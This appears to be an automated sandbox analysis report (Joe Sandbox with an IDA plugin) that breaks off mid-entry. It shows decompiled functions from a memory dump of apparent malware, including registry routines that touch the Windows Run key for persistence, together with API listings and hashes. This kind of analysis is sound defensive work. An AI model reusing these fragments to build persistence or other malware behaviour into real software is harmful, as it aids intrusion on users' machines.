                                      0x004356b6
                                      0x004356bc
                                      0x004356c0
                                      0x004356c7
                                      0x004356d4
                                      0x004356dc
                                      0x004356e1
                                      0x004356e6
                                      0x004356ef
                                      0x004356f7
                                      0x004356ff
                                      0x00435707
                                      0x00435712
                                      0x0043571a
                                      0x00435727
                                      0x00435732
                                      0x00435734
                                      0x00435737
                                      0x0043573f
                                      0x00435747
                                      0x0043574c
                                      0x00435751
                                      0x00435754
                                      0x00435754
                                      0x0043575e
                                      0x00435761
                                      0x00435764
                                      0x00435767
                                      0x00435778

                                      APIs
                                      • Sleep.KERNEL32(000001F4,?,?,00000000), ref: 004355B6
                                        • Part of subcall function 0043FBFC: MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0043FC14
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 004331F5
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433202
                                        • Part of subcall function 004331EC: lstrcpyA.KERNEL32(00000000,?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433215
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreeMessageSleepVirtual
                                      • String ID: .bss
                                      • API String ID: 413233750-3890483948
                                      • Opcode ID: c0d1b6ce4ca0b104dd5544cb3f809ce99e8ef7766c747fd1f0be86af13855076
                                      • Instruction ID: b6f1aff6761c573c0eecdc1211f7fa7820bddefa51f94b635ef95e8c01bb2584
                                      • Opcode Fuzzy Hash: c0d1b6ce4ca0b104dd5544cb3f809ce99e8ef7766c747fd1f0be86af13855076
                                      • Instruction Fuzzy Hash: B6515F71901109EFCB04EFA5D9D18EEB7B5BF48308F1051AEE416AB242EF34AB45CB94
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00CC8DD2, Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00CC8EED: _free.LIBCMT ref: 00CC8F4D
                                        • Part of subcall function 00CC8B66: GetOEMCP.KERNEL32(00000000,00CC8DED,?,00CC4B35,00D92144,00D92144,00CC4B35), ref: 00CC8B91
                                      • _free.LIBCMT ref: 00CC8E4A
                                      • _free.LIBCMT ref: 00CC8E80
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: c1c795604de53c7bc22823a0464b17150f39aae159bfb0dd2241ab9ee59ac028
                                      • Instruction ID: 7e1f9e6b5d2f6c6bf0beb9110ae974c8f22ad1553287ed996afc215063d12f2b
                                      • Opcode Fuzzy Hash: c1c795604de53c7bc22823a0464b17150f39aae159bfb0dd2241ab9ee59ac028
                                      • Instruction Fuzzy Hash: DF31B276900249AFCB11EF99C841FAF77E4EF44324F15015EF924AB2A1EB319D54DB50
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 00CC63C0, Relevance: 3.1, APIs: 2, Instructions: 56COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c0b8313afc90c22356557142839663577100fcd6f0edb01569c199ecd99ca51
                                      • Instruction ID: 92231f5ee94111ace5b377e8de1da19602b122969c37e20d94bcf4bf8a3746da
                                      • Opcode Fuzzy Hash: 2c0b8313afc90c22356557142839663577100fcd6f0edb01569c199ecd99ca51
                                      • Instruction Fuzzy Hash: 4F01F1776002559F9B2ACF2AED80F5B33DAEB85320B648129FA25CB194DA30DD419690
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00433381, Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 91%
                                      			E00433381(short** __ecx, intOrPtr _a4) {
				short** _v8;
				char* _t12;
				void* _t15;
				int _t35;
				short** _t36;

				_push(__ecx);
				_v8 = __ecx;
				E00432FF0(_a4);
				if( *__ecx != 0) {
					_t35 = WideCharToMultiByte(0, 0x200,  *__ecx, E0043308E(__ecx), 0, 0, 0, 0);
					_t12 = E00435A3C(_t35);
					_t36 = _v8;
					_t22 = _t12;
					WideCharToMultiByte(0xfde9, 0,  *_t36, E0043308E(_t36), _t12, _t35, 0, 0);
					_t15 = E004331EC( &_v8, _t22); // executed
					E00432F52(_a4, _t15); // executed
					E00435A2D(_v8);
					E00435A2D(_t22);
				}
				return _a4;
			}








                                      0x00433384
                                      0x0043338c
                                      0x0043338f
                                      0x00433398
                                      0x004333b4
                                      0x004333b8
                                      0x004333c2
                                      0x004333c5
                                      0x004333d9
                                      0x004333e3
                                      0x004333ec
                                      0x004333f4
                                      0x004333fb
                                      0x004333fb
                                      0x00433406

                                      APIs
                                        • Part of subcall function 0043308E: lstrlenW.KERNEL32(?,00433473,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00433095
                                      • WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00434AC0,?), ref: 004333AE
                                        • Part of subcall function 00435A3C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0043347F,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00435A46
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 004333D9
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 004331F5
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433202
                                        • Part of subcall function 004331EC: lstrcpyA.KERNEL32(00000000,?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433215
                                        • Part of subcall function 00432F52: lstrcatA.KERNEL32(00000000,?,?,00000000,?,004333F1,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 00432F7E
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
                                      • String ID:
                                      • API String ID: 346377423-0
                                      • Opcode ID: f564063857ccbbfed09e6d1b06120fd76ebb38e3e6a41739f98540f42ea4e214
                                      • Instruction ID: d7e1f2d09106f8b5ae63c174f7cddd8cc8517eb281cab2d2c19e85e545963e67
                                      • Opcode Fuzzy Hash: f564063857ccbbfed09e6d1b06120fd76ebb38e3e6a41739f98540f42ea4e214
                                      • Instruction Fuzzy Hash: 5601DD71300114B7CB15BFA6DD82FAE7A6DAF0D704F10102EB5059B182CAB85E00D79D
                                      Uniqueness

                                      Uniqueness Score: 0.12%

                                      Function 0043EF61, Relevance: 3.0, APIs: 2, Instructions: 50registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E0043EF61(void** __ecx, void* __edx, short** _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				long _t13;
				void* _t14;
				long _t18;
				short** _t22;
				void** _t30;

				_push(__ecx);
				_push(__ecx);
				_t22 = _a4;
				_t30 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_t13 = RegQueryValueExW( *__ecx,  *_t22, 0,  &_v12, 0,  &_v8); // executed
				if(_t13 != 0) {
					L3:
					_t14 = 0;
				} else {
					_t34 = E00435ADB(_v8);
					_t18 = RegQueryValueExW( *_t30,  *_t22, 0,  &_v12, _t15,  &_v8); // executed
					if(_t18 != 0) {
						goto L3;
					} else {
						E00432DC1(_a8, _t34, _v8);
						_t14 = 1;
					}
				}
				return _t14;
			}










                                      0x0043ef64
                                      0x0043ef65
                                      0x0043ef67
                                      0x0043ef70
                                      0x0043ef7c
                                      0x0043ef81
                                      0x0043ef84
                                      0x0043ef8c
                                      0x0043efc2
                                      0x0043efc2
                                      0x0043ef8e
                                      0x0043ef96
                                      0x0043efa7
                                      0x0043efaf
                                      0x00000000
                                      0x0043efb1
                                      0x0043efb8
                                      0x0043efbf
                                      0x0043efbf
                                      0x0043efaf
                                      0x0043efc8

                                      APIs
                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0043F3B9,?,0000000A,80000001), ref: 0043EF84
                                        • Part of subcall function 00435ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0043E415,?,?,00000000,004355C4,?,?,00000000), ref: 00435ADE
                                        • Part of subcall function 00435ADB: HeapAlloc.KERNEL32(00000000,?,00000000,004355C4,?,?,00000000), ref: 00435AE5
                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,0043F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043EFA7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HeapQueryValue$AllocProcess
                                      • String ID:
                                      • API String ID: 174754664-0
                                      • Opcode ID: 752a47bd553aec661c870ba33c4b2374832861da8af2b225468ab1205bfa92c2
                                      • Instruction ID: eb1f50b2d82113de750b9dcf4efc04a96a2eaea637ce814cd3c63cf103aaacc1
                                      • Opcode Fuzzy Hash: 752a47bd553aec661c870ba33c4b2374832861da8af2b225468ab1205bfa92c2
                                      • Instruction Fuzzy Hash: 45011A76600118BFAB15DBA2CC85DAF7BBCEF49354F20006AF502D6250E6B1AE04EB64
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0043EFFE, Relevance: 3.0, APIs: 2, Instructions: 47registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043EFFE(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
				long _t10;
				short** _t22;
				void** _t23;

				_t23 = __ecx;
				_t22 = _a8;
				if(_a16 == 0 || E0043D721(_a4, _t22) != 0) {
					L4:
					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
					if(_t10 != 0) {
						goto L6;
					}
					return _t10 + 1;
				} else {
					_a16 = 0;
					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
						L6:
						return 0;
					}
					E0043EF4C(_t23);
					goto L4;
				}
			}






                                      0x0043f005
                                      0x0043f008
                                      0x0043f00e
                                      0x0043f043
                                      0x0043f04d
                                      0x0043f055
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043f01e
                                      0x0043f021
                                      0x0043f03a
                                      0x0043f05a
                                      0x00000000
                                      0x0043f05a
                                      0x0043f03e
                                      0x00000000
                                      0x0043f03e

                                      APIs
                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043F04D
                                        • Part of subcall function 0043D721: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000,?,?,0043F01A,?,?,?,?,0043F392,80000001,?,000F003F), ref: 0043D737
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,0043F392,80000001,?), ref: 0043F032
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$CloseCreate
                                      • String ID:
                                      • API String ID: 1752019758-0
                                      • Opcode ID: 5ad5d0e7789217ee7a88bd24d9ae03935943760d82e616e749edb308f54d4f8e
                                      • Instruction ID: 5d205d8c47116aec07be11496a031d29fb52010b7f48d0ae6d73445f7d414c00
                                      • Opcode Fuzzy Hash: 5ad5d0e7789217ee7a88bd24d9ae03935943760d82e616e749edb308f54d4f8e
                                      • Instruction Fuzzy Hash: B401AD3160410DBFAB108F66DC80CBB3B6DEF09398B10503AF90891211E775DD259AA4
                                      Uniqueness

                                      Uniqueness Score: 0.24%

                                      Function 00CC4DFC, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00CC9317: GetEnvironmentStringsW.KERNEL32 ref: 00CC9320
                                        • Part of subcall function 00CC9317: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CC9343
                                        • Part of subcall function 00CC9317: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CC9369
                                        • Part of subcall function 00CC9317: _free.LIBCMT ref: 00CC937C
                                        • Part of subcall function 00CC9317: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CC938B
                                      • _free.LIBCMT ref: 00CC4E3C
                                      • _free.LIBCMT ref: 00CC4E43
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                      • String ID:
                                      • API String ID: 400815659-0
                                      • Opcode ID: 57abde0edee1b90e25933472dd27adb161346918d5c6e6a1f952641042c4f26e
                                      • Instruction ID: 85bb03a1ec37dd4b33fd6d45772707084c7bd663f78c1d6eb28469dce183436d
                                      • Opcode Fuzzy Hash: 57abde0edee1b90e25933472dd27adb161346918d5c6e6a1f952641042c4f26e
                                      • Instruction Fuzzy Hash: 5DE02B2790962241E326267EEC12F6F52416B81335B57831FFC20C72D2DEA08C0211E5
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 00CC22B0, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00CC249C: try_get_function.LIBVCRUNTIME ref: 00CC24B1
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC22CE
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CC22D9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                      • String ID:
                                      • API String ID: 806969131-0
                                      • Opcode ID: d4aad0c8b3ae979ecf12ca41f69b70cbdd25183451872b2b547de451ccc0fde8
                                      • Instruction ID: 8b46b3009c11416d055dc4e80fbe6525adb43aa2c91db4fd86f8381e468ffa42
                                      • Opcode Fuzzy Hash: d4aad0c8b3ae979ecf12ca41f69b70cbdd25183451872b2b547de451ccc0fde8
                                      • Instruction Fuzzy Hash: 08D02228C08312182D083AB4FC02FAE23449A227B23B0074EE030CA0C2EF108204303A
                                      Uniqueness

                                      Uniqueness Score: 0.34%

                                      Function 0043FB09, Relevance: 3.0, APIs: 2, Instructions: 14sleepCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043FB09(signed int _a4) {

				Sleep(1); // executed
				return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
			}



                                      0x0043fb0e
                                      0x0043fb31

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountSleepTick
                                      • String ID:
                                      • API String ID: 2804873075-0
                                      • Opcode ID: 370db7e7fc4b6ece0a8d274b51a76040b4424d6fb9d01a44416feadff5563f7a
                                      • Instruction ID: b9316f9715dbc92c23b42676d379b039cfea1dc5c6dde9137c724e2641931a46
                                      • Opcode Fuzzy Hash: 370db7e7fc4b6ece0a8d274b51a76040b4424d6fb9d01a44416feadff5563f7a
                                      • Instruction Fuzzy Hash: 99D0A9342481044BE30C9B0AFE4E2613A4EC7C2301F00803BF20EC90A0C9A155904458
                                      Uniqueness

                                      Uniqueness Score: 1.69%

                                      Function 0043E221, Relevance: 3.0, APIs: 2, Instructions: 8synchronizationUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043E221(void** __ecx) {
				int _t2;
				void** _t4;

				_t4 = __ecx;
				ReleaseMutex( *__ecx);
				_t2 = CloseHandle( *_t4); // executed
				return _t2;
			}





                                      0x0043e222
                                      0x0043e226
                                      0x0043e22e
                                      0x0043e235

                                      APIs
                                      • ReleaseMutex.KERNEL32(?,?,0043DE9B,?,00435774,?,00000000,00000000,00000000,00000000,?,0000000A,?,?,00000000,.bss), ref: 0043E226
                                      • CloseHandle.KERNEL32(?), ref: 0043E22E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleMutexRelease
                                      • String ID:
                                      • API String ID: 4207627910-0
                                      • Opcode ID: 1644dc8f955d0cf500b1cc342ac13ed98a0ce272508d8cd64e4d11a00b23e16a
                                      • Instruction ID: 83d4cf42ec45fb5cf043d240c95feeaf4e309a74ff8fafb4305d4332fd7fc796
                                      • Opcode Fuzzy Hash: 1644dc8f955d0cf500b1cc342ac13ed98a0ce272508d8cd64e4d11a00b23e16a
                                      • Instruction Fuzzy Hash: D4B0923E000020DFEB212F94FD0C8957BA5FF0A35135904BAF281811388BE20C519B84
                                      Uniqueness

                                      Uniqueness Score: 23.02%

                                      Function 00435A87, Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00435A87(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}




                                      0x00435a91
                                      0x00435a97

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,00432DD7,?,?,?,0043E39B,?,004358E9,?,?,00000000,?,004355D2,00000000), ref: 00435A8A
                                      • RtlAllocateHeap.NTDLL(00000000,?,0043E39B,?,004358E9,?,?,00000000,?,004355D2,00000000,?,?,00000000), ref: 00435A91
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcess
                                      • String ID:
                                      • API String ID: 1357844191-0
                                      • Opcode ID: 9d6ff2e64fab0177e10ba47913dff2e9bf70e92c8370c64ebf802ea774eef30c
                                      • Instruction ID: 3283e0cb2668388f01a694b234acd9d416791b44e7d6155fef376f31b540ae65
                                      • Opcode Fuzzy Hash: 9d6ff2e64fab0177e10ba47913dff2e9bf70e92c8370c64ebf802ea774eef30c
                                      • Instruction Fuzzy Hash: BEA001B9954240AFEE846BA1AE0EB1A3A28AB46702F944568B316860A09AE554008A39
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      Function 00435A76, Relevance: 2.5, APIs: 2, Instructions: 6memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00435A76(void* __ecx) {
				int _t2;

				_t2 = HeapFree(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}




                                      0x00435a80
                                      0x00435a86

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,00435A61,00432DD7,?,?,?,0043E39B,?,004358E9,?,?,00000000,?,004355D2,00000000), ref: 00435A79
                                      • HeapFree.KERNEL32(00000000,?,0043E39B), ref: 00435A80
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
